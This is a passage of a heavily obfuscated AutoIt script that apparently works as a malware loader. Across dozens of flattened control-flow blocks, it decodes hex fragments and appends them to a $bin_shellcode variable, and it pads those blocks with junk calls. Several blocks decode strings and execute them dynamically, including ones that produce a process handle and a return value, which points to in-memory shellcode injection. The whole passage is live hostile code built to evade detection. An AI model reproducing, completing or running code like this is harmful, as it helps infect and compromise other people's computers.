  5503. Local $shellcode_struct = $e($b(wmhsrosshiij(tznhxlbucosri("x043C703032374237413733303336333132373330303733363231323533303231363C36363236333D3330323136343337323C32313237423742373232423032313136463636343632363436303236323D32314037463436323634363631304636363746343630323743343137323C3231323742374237323242303231363D3"), tznhxlbucosri("x057846634"))))
  5504. Mod(3143233, 199221)
  5505. $2102046848 = 281617475
  5506. Ptr(tznhxlbucosri("OeJj7bdEpehzFCa8qQGKOhJFJVwTytlWrSSpHQl7g4TSE6SUY"))
  5507. EndIf
  5508. If 118 >= 109 AND 213 <> 287 AND 177 <= 283 AND 125 = 125 AND 228 >= 126 AND $2102046848 = 866968452 Then
  5509. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x083646453533403839343536483835334037353134363830303"), tznhxlbucosri("x0E4"))
  5510. $2102046848 = 1426700078
  5511. Chr(559932)
  5512. Chr(908528)
  5513. EndIf
  5514. If 291 > 214 AND 235 > 193 AND 163 >= 143 AND 231 = 231 AND $2102046848 = 868642390 Then
  5515. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x034334374741374131313131323133393835343442493342493"), tznhxlbucosri("x0D62794"))
  5516. $2102046848 = 1514877158
  5517. Mod(1663309, 771074)
  5518. EndIf
  5519. If 161 <= 198 AND 217 > 120 AND 127 < 168 AND $2102046848 = 885639379 Then
  5520. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x033333403636333935363034303649343340333444334031303"), tznhxlbucosri("x0A7"))
  5521. $2102046848 = 1607184715
  5522. Random(3147178)
  5523. EndIf
  5524. If 299 <> 255 AND 110 > 108 AND 152 <> 240 AND 183 > 139 AND 191 > 122 AND $2102046848 = 909112051 Then
  5525. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x003637333633483247344440383333473333403336454832403"), tznhxlbucosri("x085"))
  5526. Ptr(tznhxlbucosri("Jq6s9bJ0Tg7FwWoceTBISHjQdZBr6vMIInfCqlmyQAzoBYM1H5k3IqIbj47hyRjn3jmU"))
  5527. $2102046848 = 71527144
  5528. Dim $cqva1dquwmofycxvng3l = tznhxlbucosri("AjbF")
  5529. EndIf
  5530. If 243 < 256 AND 296 <> 146 AND 247 < 261 AND $2102046848 = 937438825 Then
  5531. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x073631383839373533483834443532443347383535383646464"), "0x")
  5532. $2102046848 = 1838106253
  5533. IsFloat(1966008 - 3661052 - 630017)
  5534. EndIf
  5535. If 110 <> 103 AND 123 <= 136 AND 300 <> 270 AND 270 > 213 AND 228 <= 259 AND $2102046848 = 937593386 Then
  5536. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x043333334938333548303838393434464031493645464646464"), "0x")
  5537. IsPtr(tznhxlbucosri("gzGVOgWbsb0pz9ayOz6ItH4KfBXxmHQyjD8cyE8KmRiCeoUIMReyflgt1EafnrYoJ4ZwAxbEKdvpC0wOMF4guYxD5ZMCKtCQN8NnTSqwh"))
  5538. $2102046848 = 552220289
  5539. Random(1018878)
  5540. EndIf
  5541. If 198 >= 158 AND 237 <= 247 AND 290 <= 298 AND 253 <= 271 AND $2102046848 = 940272054 Then
  5542. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x083534434645464646464530364645353548363833434032303"), tznhxlbucosri("x057"))
  5543. $2102046848 = 974397906
  5544. IsBinary(tznhxlbucosri("Ja8gBa17CSW4mxboWN0qAW2t1GAOKBcfNwNNTH"))
  5545. Int(1049573)
  5546. EndIf
  5547. If 140 = 140 AND 122 = 122 AND 231 >= 202 AND 152 <= 206 AND $2102046848 = 960210641 Then
  5548. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x083247363138383937353248383937344348363438324335333"), "0x")
  5549. IsFloat(tznhxlbucosri("XcdkxTHqpIBnWjzGxhz2IUDKd5HvWFlWqCNMGrNwgfxfrtiI0VjHOYD0RmOiScWbbD383j"))
  5550. $2102046848 = 2141934138
  5551. EndIf
  5552. If 289 = 289 AND 273 <> 118 AND 222 >= 152 AND 260 < 265 AND 199 <> 219 AND $2102046848 = 960345959 Then
  5553. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x083447364646464646483243483835334937343230303642454"), "0x")
  5554. $2102046848 = 1681609778
  5555. EndIf
  5556. If 224 > 182 AND 190 = 190 AND 237 = 237 AND $2102046848 = 963435038 Then
  5557. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x093435424744474747474431343334333730413534333433343"), tznhxlbucosri("x047A735"))
  5558. $2102046848 = 192622806
  5559. Mod(2456918, 1507072)
  5560. Dim $kxrlxes4rsq91r7ijvma = 7455 - 2062142 + 3307677 * 1428431 - 3485437
  5561. EndIf
  5562. If 181 >= 154 AND 116 < 266 AND 141 = 141 AND $2102046848 = 974397906 Then
  5563. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0434343C304C313534324742424242413432424131314C3C364"), tznhxlbucosri("x0C6853676"))
  5564. Chr(72080)
  5565. $2102046848 = 1761794683
  5566. EndIf
  5567. If 253 > 113 AND 155 <= 156 AND 267 > 206 AND $2102046848 = 1008938193 Then
  5568. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x074834324135313935453548324430343137474636344539334"), tznhxlbucosri("x05674D6"))
  5569. IsBool(tznhxlbucosri("t2nY85CqCXindAF1BWUSMcniz7Vj8ZMzSZ"))
  5570. $2102046848 = 1800994994
  5571. String(42284 + 1607045 * 2858968)
  5572. EndIf
  5573. If 131 <> 241 AND 118 > 106 AND 272 <> 244 AND 264 = 264 AND 298 > 176 AND $2102046848 = 1022397440 Then
  5574. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x074434334539334535474139354637433931374346353731373"), tznhxlbucosri("x0F6A667"))
  5575. $2102046848 = 548714918
  5576. Ptr(tznhxlbucosri("lopJYENFcYsKyTiQAlDtVM8zyezOib"))
  5577. EndIf
  5578. If 220 > 119 AND 146 >= 120 AND 232 <= 250 AND 135 >= 133 AND $2102046848 = 1025992990 Then
  5579. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x053430413938393435313747474747474935453438313938393"), tznhxlbucosri("x0348415"))
  5580. String(tznhxlbucosri("XaEuVIcVNOrJOfNOGcL6VCkLjgLfhQ4Z8qvO60TUS2uUgEVJEv"))
  5581. $2102046848 = 84602552
  5582. Chr(3359875)
  5583. Dim $xzoiwhzobh9txgwnuuaq = 2693847 + 2302618 + 1050886
  5584. EndIf
  5585. If 213 >= 175 AND 209 <= 292 AND 114 = 114 AND 177 >= 130 AND $2102046848 = 1028023753 Then
  5586. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x024731333340333641303642473436313438393734464838393"), "0x")
  5587. $2102046848 = 486612862
  5588. Chr(78271)
  5589. EndIf
  5590. If 271 > 178 AND 123 >= 111 AND 295 <> 207 AND 191 <> 146 AND 243 <> 101 AND $2102046848 = 1044747412 Then
  5591. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x064646464646493332414934303333473835373836464646464"), tznhxlbucosri("x075"))
  5592. Int(245898)
  5593. $2102046848 = 1527329642
  5594. Mod(2055448, 3364517)
  5595. EndIf
  5596. If 117 > 100 AND 158 <> 177 AND 179 <> 258 AND $2102046848 = 1057862206 Then
  5597. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x063435493747443430493932374341343137493736363742474"), tznhxlbucosri("x0E66784"))
  5598. IsFloat(1851681 + 820465)
  5599. $2102046848 = 1295395021
  5600. EndIf
  5601. If 153 <> 129 AND 180 > 144 AND 273 <> 219 AND 207 > 129 AND $2102046848 = 1079761819 Then
  5602. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x033233483247344440383333473233403336454646473736434"), tznhxlbucosri("x095"))
  5603. WinExists(tznhxlbucosri("osKlIfhjBIakXyZVh5oICDph"))
  5604. $2102046848 = 2086657544
  5605. EndIf
  5606. If 278 <= 299 AND 111 >= 100 AND 231 > 109 AND 137 <> 139 AND 111 < 124 AND $2102046848 = 1087129617 Then
  5607. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x03323337323A3B31473745433B314731333737323B30364B333"), tznhxlbucosri("x057A4"))
  5608. $2102046848 = 1585046344
  5609. WinExists(tznhxlbucosri("DNmvI2amfdzYOiTCNW0T6hrp2wy6A7pj3"))
  5610. EndIf
  5611. If 237 < 250 AND 189 < 208 AND 258 > 190 AND 116 <> 156 AND $2102046848 = 1114015006 Then
  5612. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x074744343345323232413938363547413737323345373137363"), tznhxlbucosri("x07584A7"))
  5613. $2102046848 = 1079761819
  5614. EndIf
  5615. If 180 <> 292 AND 236 <= 263 AND 208 > 142 AND $2102046848 = 1115248989 Then
  5616. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x053C343737424C3D313132474C3D3030424C3C3D3031343C3C3"), tznhxlbucosri("x0D4D675A5"))
  5617. Dim $lpawifru7mzejrnez9my = 194192
  5618. $2102046848 = 1424029346
  5619. IsBool(2578418 + 3881500 - 1181043)
  5620. Dim $vaqkuzsmc7zzudmqfvqb = tznhxlbucosri("tJoBdDO")
  5621. EndIf
  5622. If 213 > 109 AND 261 <> 243 AND 210 = 210 AND $2102046848 = 1121997128 Then
  5623. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x053448343335303839353446434646453535483631443438344"), "0x")
  5624. WinExists(tznhxlbucosri("iDm6oYmp0g8iRT8srZ63iGl7YRpvcw5Ancmu9Hr2egnvvAHTelEZ8NveVk9F93d0nyE5gv0Az"))
  5625. $2102046848 = 940272054
  5626. IsString(2982286 - 330255 * 277525 + 831397)
  5627. Dim $j9cxc3yhorymznlfn9fc = 580493
  5628. EndIf
  5629. If 224 <= 236 AND 187 >= 174 AND 141 = 141 AND $2102046848 = 1138618150 Then
  5630. Local $handlefrompid = $e($b(wmhsrosshiij(tznhxlbucosri("x033B7737353045304730353235304530413B31313531453634313536453635304030303131364537353045304131313041333131353B3532353645373530453631313130413331313735443335363536463334313535453035363430343031313130413331313537343435354431353731313130413331313033343B303330333032373530333735373537353131313041333131353135354535453041313130413331313033313131304133313135373434353544313537313131304133313736313536343736314131303331313637413A363141313033313136374"), tznhxlbucosri("x066C6"))))
  5631. Chr(28664)
  5632. $2102046848 = 819068712
  5633. EndIf
  5634. If 295 < 299 AND 131 = 131 AND 263 = 263 AND $2102046848 = 1141152127 Then
  5635. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x034839383535303646464646464834443533434347383536303"), tznhxlbucosri("x064"))
  5636. IsString(3432546 - 250249 - 1455544)
  5637. $2102046848 = 834897274
  5638. IsFloat(tznhxlbucosri("H6159LmOo0H5LzsWt8RluBIqY1abIMAZfwCDco6CM2SLY5B7d13HGFKcwq"))
  5639. Random(2611743)
  5640. EndIf
  5641. If 156 > 154 AND 153 >= 110 AND 105 > 103 AND 213 < 282 AND 154 <= 217 AND $2102046848 = 1196477466 Then
  5642. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x02303A314642473333333333333437333A35453735323533323"), tznhxlbucosri("x01756"))
  5643. Chr(1967561)
  5644. $2102046848 = 588931838
  5645. EndIf
  5646. If 286 > 144 AND 112 <> 292 AND 266 <> 223 AND $2102046848 = 1220020015 Then
  5647. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x013731323133373732424C3D3330464C32303C3647313734343"), tznhxlbucosri("x01775E486"))
  5648. $2102046848 = 232684580
  5649. Ptr(2858800 - 230488 * 2299691)
  5650. EndIf
  5651. If 289 <> 262 AND 147 = 147 AND 128 > 106 AND 287 >= 248 AND 204 >= 120 AND $2102046848 = 1267601999 Then
  5652. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x083938353334364646464646483444353444383938353338364"), tznhxlbucosri("x075"))
  5653. $2102046848 = 2094513307
  5654. Dim $3l2do8ndusammtgaldqs = tznhxlbucosri("S26Ux6aECruJorlhl2JqxUlpnALpI")
  5655. EndIf
  5656. If 106 >= 103 AND 254 < 273 AND 134 <= 204 AND 178 >= 172 AND $2102046848 = 1273168829 Then
  5657. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x064247343344314038383135413646403640303030303330314"), "0x")
  5658. Ptr(tznhxlbucosri("hiKSdTZdr1fvYz1Uh9EEHBTE3i2A5KDnNnVdQCQ1zuitk1UmaO9OFsJbL"))
  5659. $2102046848 = 1087129617
  5660. Ptr(687537 * 270823)
  5661. IsPtr(3930127 + 1072661 * 657810)
  5662. EndIf
  5663. If 141 >= 110 AND 220 <= 245 AND 137 <= 224 AND $2102046848 = 1276279416 Then
  5664. Local $ret = $e($b(wmhsrosshiij(tznhxlbucosri("x003874343633463344333631363346334431363436343732363537333733323832323634373736364732363432323233423032343633473035333638363536334633463336364634363532303232423032323330373834323435323232334230323237373733373437323232323342303234373735303631373436383233423032323737373337343732323232334230323232323233423032323730373437323232323342303434363346334533373437323735363337343437363537343530373437323238323434363639363346353536453337343732373536333734323932393"), tznhxlbucosri("x076"))))
  5665. $2102046848 = 1138618150
  5666. IsFloat(tznhxlbucosri("nqSkCLDibnjcxk9eAsQ9uLDT8vpvEi7iO70OiRrj50ofaW011rpOGR57QEMw3hTvf2EmS"))
  5667. EndIf
  5668. If 129 >= 114 AND 119 <> 204 AND 156 < 291 AND 180 <> 213 AND 232 < 285 AND $2102046848 = 1293364258 Then
  5669. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x003036314030363140343834443532434530383248353244364"), tznhxlbucosri("x094"))
  5670. $2102046848 = 113573692
  5671. IsFloat(tznhxlbucosri("uSEhq730zpUSauFV6kwJQwvXdhDI98qRbQb7LFe693XZ8Xr3Vy3G2hchH"))
  5672. EndIf
  5673. If 202 = 202 AND 275 > 202 AND 138 > 104 AND 142 <> 220 AND $2102046848 = 1295395021 Then
  5674. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x064646433333403536453545324832454535344342303340303"), tznhxlbucosri("x0E6"))
  5675. WinExists(tznhxlbucosri("4vSqdAcsaTaHDE0wIajjfqBnjY4YD5oVvceGeI4woJVO39xLlUmHTnpAYRr4ypphsoi7s75rplcICz4CAHTk6"))
  5676. $2102046848 = 515584002
  5677. Int(3678968)
  5678. EndIf
  5679. If 251 >= 111 AND 194 = 194 AND 100 < 301 AND $2102046848 = 1307843693 Then
  5680. Local $bin_shellcode = wmhsrosshiij(tznhxlbucosri("x033B76363B3146404B314737433B3B3140423B33303A3333343"), tznhxlbucosri("x01627"))
  5681. Dim $olhzfq6cab4la8jy0nva = 2957174
  5682. $2102046848 = 304222797
  5683. String(tznhxlbucosri("MrQnG4gVxJ94W6e7S9tZdIFjjAjyZuT60gsyVowG31Wx0EIrOcFZ9IohSDUoKiVVkAg3OwoZBlOCwOJb2"))
  5684. IsFloat(tznhxlbucosri("hkkTGYXFpoMhtuk7wmJZguBFgIORs1fDaUValxs0yTnncHRcSMM"))
  5685. EndIf
  5686. If 171 >= 127 AND 132 < 195 AND 112 <= 122 AND $2102046848 = 1312944448 Then
  5687. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x003734303243413548313833333640383135463646464646464"), "0x")
  5688. Chr(379658)
  5689. $2102046848 = 1337610490
  5690. EndIf
  5691. If 283 <= 299 AND 269 <= 284 AND 139 = 139 AND 296 = 296 AND 290 <= 293 AND $2102046848 = 1317804907 Then
  5692. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x013435343434343737324242424332313032424331353431373"), tznhxlbucosri("x086169535"))
  5693. Ptr(3702871 + 3518540 + 1253073 + 3153696)
  5694. $2102046848 = 1114015006
  5695. Random(3545599)
  5696. EndIf
  5697. If 264 <> 189 AND 265 <= 294 AND 234 > 155 AND 143 <> 247 AND 148 >= 107 AND $2102046848 = 1329218685 Then
  5698. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0136403247424242424C373744343C313432424331304C32424"), tznhxlbucosri("x03625A6A5"))
  5699. $2102046848 = 503206081
  5700. Random(137117)
  5701. EndIf
  5702. If 244 < 278 AND 204 > 184 AND 245 = 245 AND 195 <= 262 AND $2102046848 = 1337610490 Then
  5703. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x03354734373A3436364336354B3140453636463740413337333"), tznhxlbucosri("x0C4A5"))
  5704. Int(3674689)
  5705. $2102046848 = 171873601
  5706. Dim $jic2craejsxa5mnuijlr = 1433574
  5707. EndIf
  5708. If 181 < 207 AND 181 <= 298 AND 171 = 171 AND 158 > 122 AND 265 >= 100 AND $2102046848 = 1374512406 Then
  5709. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x093835343749393432413634323349343747413749353332313"), tznhxlbucosri("x0A5A734"))
  5710. IsPtr(tznhxlbucosri("HXxyb"))
  5711. $2102046848 = 1840174020
  5712. String(tznhxlbucosri("KCy2vwKKdo4EVV2UEVMERdxcKSatpz0mKqKQ7zrRnomH3HNXiM44A2W4DHWRKc8kO0kMjeXCnX0x0iZ0QYrwru074Q6c5qNpIc2vLpDIgQNhddRM2Mv7"))
  5713. EndIf
  5714. If 148 = 148 AND 182 < 236 AND 283 < 288 AND 249 <> 197 AND 232 = 232 AND $2102046848 = 1390580830 Then
  5715. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x064735344346464535314038353340303648343938303230303"), tznhxlbucosri("x056"))
  5716. IsFloat(1926613 + 2091025)
  5717. $2102046848 = 1293364258
  5718. Random(2945571)
  5719. IsString(2271443 + 3556879)
  5720. EndIf
  5721. If 163 > 116 AND 103 <= 173 AND 178 <> 266 AND 235 <> 199 AND 256 <> 174 AND $2102046848 = 1424029346 Then
  5722. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x053340373431393832403432423033334735303548383236464"), "0x")
  5723. Dim $xmqusy83zi5xkbiywjjp = 2698920 + 1020135 + 835350 * 1208993
  5724. $2102046848 = 89876260
  5725. String(tznhxlbucosri("xx1aV3inf2OtROgWRdBF4NDMnwMinffME1XzrBKFA6JwK9Fyl2"))
  5726. Ptr(3106248 * 2100040 - 2661738)
  5727. EndIf
  5728. If 146 <= 295 AND 200 = 200 AND 130 = 130 AND 152 < 240 AND 229 < 252 AND $2102046848 = 1426700078 Then
  5729. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0B3333333333363436303545463630473B3146374540464A354"), tznhxlbucosri("x03654"))
  5730. Dim $oboxjq9nwl5fmhcdwzlv = tznhxlbucosri("fGbq6T5b1Xv7SxVioX2o5G3wIsS5Scb0jZwiV7uAT8u8k7ZZS4J82wKvwSjTtbf36aoGVJbY4YY4c6i6fUuXpT6NGXKNqcNs30atKMip64CW")
  5731. $2102046848 = 1317804907
  5732. IsBinary(1708455 - 3704501 - 2221874)
  5733. EndIf
  5734. If 214 <> 156 AND 226 <> 223 AND 223 = 223 AND $2102046848 = 1472136877 Then
  5735. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x054645464646464834443539334530363140323646473635343"), tznhxlbucosri("x0A4"))
  5736. $2102046848 = 473753307
  5737. EndIf
  5738. If 206 = 206 AND 114 >= 103 AND 204 = 204 AND $2102046848 = 1488986972 Then
  5739. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x024C30403137443C3D3C3137343242424242424C3040313D3C3"), tznhxlbucosri("x057441716"))
  5740. IsBinary(tznhxlbucosri("SdF50izNDW9l2pk81BhxGrSIjcbn7R1pIQ7KeEfqi2qJKgkmcjOGjnGRnj9CLLZTunQsaqwOrJjor6BKd7N2JzGMe1qYqLqCVyWdFri3jx5eH51JaLIcT"))
  5741. $2102046848 = 1267601999
  5742. IsPtr(813805 - 3039124)
  5743. EndIf
  5744. If 135 >= 129 AND 136 > 105 AND 245 < 251 AND 153 < 295 AND $2102046848 = 1514877158 Then
  5745. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0C3640323730363D3430353D3C36403042443C3640333730343"), tznhxlbucosri("x087865707"))
  5746. $2102046848 = 1273168829
  5747. Dim $zjajuqpfrlte6okn3gtv = 1700331 + 2090915 * 2743824
  5748. Chr(3073471)
  5749. EndIf
  5750. If 252 <= 278 AND 101 > 99 AND 200 < 245 AND $2102046848 = 1527329642 Then
  5751. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x064544334732493034334738353733464646464646454438373"), tznhxlbucosri("x0B4"))
  5752. $2102046848 = 1790828265
  5753. IsBinary(3424734 - 3975628 * 543343)
  5754. EndIf
  5755. If 136 <= 235 AND 107 <> 252 AND 281 >= 213 AND 210 >= 181 AND $2102046848 = 1554786304 Then
  5756. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x03354B37373633313333333335324733353B333330333333333"), tznhxlbucosri("x01516"))
  5757. $2102046848 = 752856490
  5758. IsFloat(tznhxlbucosri("A5ZzUYUMYD"))
  5759. EndIf
  5760. If 144 <= 251 AND 286 >= 177 AND 298 <= 301 AND 299 <= 301 AND $2102046848 = 1566067065 Then
  5761. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x05443B374736364B30443B363630454545454545443A37324B3"), tznhxlbucosri("x07634"))
  5762. IsBinary(436650 * 2977471)
  5763. $2102046848 = 2132281550
  5764. IsBool(893963 + 1459668)
  5765. EndIf
  5766. If 106 <> 295 AND 244 = 244 AND 283 > 146 AND $2102046848 = 1567095249 Then
  5767. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x013534393443413240483131313131313531373041313439313"), tznhxlbucosri("x086F494"))
  5768. Mod(2738098, 720065)
  5769. $2102046848 = 1008938193
  5770. IsBool(163930 * 3734125)
  5771. EndIf
  5772. If 203 <= 280 AND 132 < 196 AND 172 = 172 AND 293 <= 299 AND $2102046848 = 1569360220 Then
  5773. Local $binl = $e($b(wmhsrosshiij(tznhxlbucosri("x003874323639363546313732373934334635363542383234343236393635453645333638363536334633463336364634363532393"), tznhxlbucosri("x067"))))
  5774. $2102046848 = 1867973329
  5775. Random(3446157)
  5776. EndIf
  5777. If 102 <> 195 AND 145 <= 233 AND 295 <= 300 AND 131 <> 270 AND $2102046848 = 1585046344 Then
  5778. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0C3C3D303042443045314C3736474C333636464C36403042403"), tznhxlbucosri("x094574617"))
  5779. $2102046848 = 563894604
  5780. IsString(1081340 - 584896 + 2469337)
  5781. EndIf
  5782. If 190 = 190 AND 173 > 146 AND 198 = 198 AND $2102046848 = 1591982618 Then
  5783. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x033336363B314640463536343B314437433B303035453634364"), tznhxlbucosri("x0A414"))
  5784. $2102046848 = 960345959
  5785. Ptr(3012427 - 3907133 * 3696036)
  5786. EndIf
  5787. If 167 <= 178 AND 161 <> 233 AND 170 <= 235 AND 117 < 264 AND $2102046848 = 1598205459 Then
  5788. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x003030303037323935333336464537364647363530353336464"), tznhxlbucosri("x016"))
  5789. Dim $rxznumd6uv6taceotax2 = 168596 - 127804 * 2849313 * 2158681
  5790. $2102046848 = 47899740
  5791. IsBool(tznhxlbucosri("hvMB0XDOLMCiAIthrCNKtDlu6v1EHfUqGut72JD23uzpIwqtV"))
  5792. EndIf
  5793. If 132 < 233 AND 176 > 146 AND 185 < 204 AND 269 >= 137 AND 149 <= 259 AND $2102046848 = 1607184715 Then
  5794. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x04343434324C30314C3436343434343C304031304C31343C304"), tznhxlbucosri("x036259515"))
  5795. $2102046848 = 963435038
  5796. EndIf
  5797. If 191 <= 246 AND 211 > 197 AND 238 > 146 AND $2102046848 = 1617221087 Then
  5798. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0730433037463337363333333333354B3735404331333333333"), tznhxlbucosri("x08557"))
  5799. $2102046848 = 885639379
  5800. Ptr(tznhxlbucosri("xuciYDKTz"))
  5801. EndIf
  5802. If 287 > 249 AND 300 <= 301 AND 278 <= 289 AND $2102046848 = 1668010818 Then
  5803. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x074247474747443137474634354247474434383139343241313"), tznhxlbucosri("x0A434F6"))
  5804. WinExists(tznhxlbucosri("LXfof2W4K6F4KtjaEGfkz9WrE771e18vB2oDSf8FLAAlrJ9z7yeWZ3w0Buxi7o146p2NWhYdl8wN1nQm1e3HqsdfgLN4iJDUuR"))
  5805. $2102046848 = 2088521245
  5806. WinExists(tznhxlbucosri("84RfCkDiCowsby8IK0bqz20nkB3QIOHc59u9xkj2z7hyx0OemWcX0qEUpUappWOYVADwnbCXgSe"))
  5807. EndIf
  5808. If 161 <> 135 AND 220 <> 154 AND 298 <> 277 AND $2102046848 = 1681609778 Then
  5809. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x003733413546303430333640383243463235303030303030364"), "0x")
  5810. $2102046848 = 1312944448
  5811. EndIf
  5812. If 290 < 298 AND 158 >= 125 AND 121 < 144 AND $2102046848 = 1711264047 Then
  5813. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x003832453831334033344738324438323430333446483244303"), "0x")
  5814. $2102046848 = 1115248989
  5815. Dim $ej4h2wslurfaknhztujw = 1162421 - 2580454 + 801588
  5816. EndIf
  5817. If 280 > 153 AND 181 <> 172 AND 190 <> 198 AND 153 < 242 AND 126 < 129 AND $2102046848 = 1724676842 Then
  5818. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0C31374434324C30333C3436343434343C36403136474736403"), tznhxlbucosri("x0146515A7"))
  5819. Dim $v2adnsgm2vzuv0py3cdw = 2306442
  5820. $2102046848 = 2121580509
  5821. String(4020 - 3688060 * 2453608 - 1069095)
  5822. EndIf
  5823. If 121 < 230 AND 254 <= 299 AND 124 = 124 AND $2102046848 = 1745473337 Then
  5824. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x07403B30314542473333333333333333343535314B314731333"), tznhxlbucosri("x076A5"))
  5825. IsBinary(1221872 * 2167661)
  5826. $2102046848 = 937593386
  5827. Chr(1691251)
  5828. EndIf
  5829. If 261 < 296 AND 258 > 176 AND 160 <= 266 AND 190 >= 107 AND $2102046848 = 1761794683 Then
  5830. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0030453437433C31353432474242424244333434343534343C3"), tznhxlbucosri("x0F6869697"))
  5831. $2102046848 = 1028023753
  5832. EndIf
  5833. If 236 <> 292 AND 184 <= 233 AND 190 >= 152 AND $2102046848 = 1767117565 Then
  5834. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x01374C3C3732414436324246403641313C32424242424244324"), tznhxlbucosri("x066741636"))
  5835. $2102046848 = 724091247
  5836. WinExists(tznhxlbucosri("RGzoh1IWjyprqkEOiE6QVAqSGVcnA7nC34nIHssN2NfZ3fhp2"))
  5837. IsBinary(3713253 * 3941942 * 2631740 + 3609627)
  5838. EndIf
  5839. If 297 <> 129 AND 137 >= 134 AND 120 <= 137 AND $2102046848 = 1790828265 Then
  5840. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x024830343347343538303149323444473031334734353834303"), tznhxlbucosri("x0A5"))
  5841. Random(2756298)
  5842. $2102046848 = 93242189
  5843. EndIf
  5844. If 252 <= 259 AND 117 >= 113 AND 288 <> 278 AND 101 <= 274 AND $2102046848 = 1791391535 Then
  5845. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x004333354B3733374546454545454B3147363643364142374B3"), tznhxlbucosri("x01665"))
  5846. $2102046848 = 1899622003
  5847. String(tznhxlbucosri("L52lfrjjYF9GY5vot35y2qby8HBA8LtkzNwZWWYcBI3BvH2v0mjdw9drjnstSOHGmMv"))
  5848. WinExists(tznhxlbucosri("qgvJAYDFLloH4WtahqiVBLiU41p3au40qu37byMDQSRhCgMV3LyeTmN6BG3DpGljNVE4"))
  5849. EndIf
  5850. If 104 = 104 AND 139 >= 132 AND 136 > 126 AND 277 <> 237 AND $2102046848 = 1800994994 Then
  5851. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x043735483033343536483530364647353448364645353343483"), tznhxlbucosri("x036"))
  5852. WinExists(tznhxlbucosri("iM6ActxcqjANB5KRtt7vJGBg6GC5pH"))
  5853. $2102046848 = 793922489
  5854. Random(3339027)
  5855. Int(51559)
  5856. EndIf
  5857. If 243 <= 274 AND 265 <= 275 AND 225 <> 104 AND $2102046848 = 1813210520 Then
  5858. $e($b(wmhsrosshiij(tznhxlbucosri("x003874343633463345333734373237353633373435333635373434343631373436313238323435333638363536334633463336364634363535364533373437323735363337343233423032323733363836353633463346333636463436353232323342303234343236393635453645333638363536334633463336364634363532393"), "0x")))
  5859. $2102046848 = 1936949709
  5860. IsBinary(1068225 * 1251627)
  5861. EndIf
  5862. If 216 >= 150 AND 244 >= 233 AND 125 <> 271 AND 232 < 266 AND 127 > 117 AND $2102046848 = 1838106253 Then
  5863. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x064646473933314333403738393835323036464646464648324"), tznhxlbucosri("x017"))
  5864. $2102046848 = 1566067065
  5865. IsFloat(tznhxlbucosri("y9x"))
  5866. EndIf
  5867. If 175 < 239 AND 123 <= 294 AND 284 = 284 AND 270 = 270 AND 109 > 106 AND $2102046848 = 1840174020 Then
  5868. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x023030303036314430363830303330303030303646473635303"), tznhxlbucosri("x067"))
  5869. IsBool(tznhxlbucosri("QftM9sH1ZA00QYGKeoSchacSKsx5p0Q1pAMk9sN2z4nqilSKcEYKBGB"))
  5870. $2102046848 = 589339962
  5871. IsBool(tznhxlbucosri("CdlRj8Iy8EonylKXD1k0naX2cO9inXSNk8AJeSbobTGnvZiM0NEg0U0Q4K6GzarVFtbqvYW3Yo9Av9s8az7u"))
  5872. EndIf
  5873. If 108 <> 169 AND 239 = 239 AND 186 < 203 AND 263 = 263 AND $2102046848 = 1867973329 Then
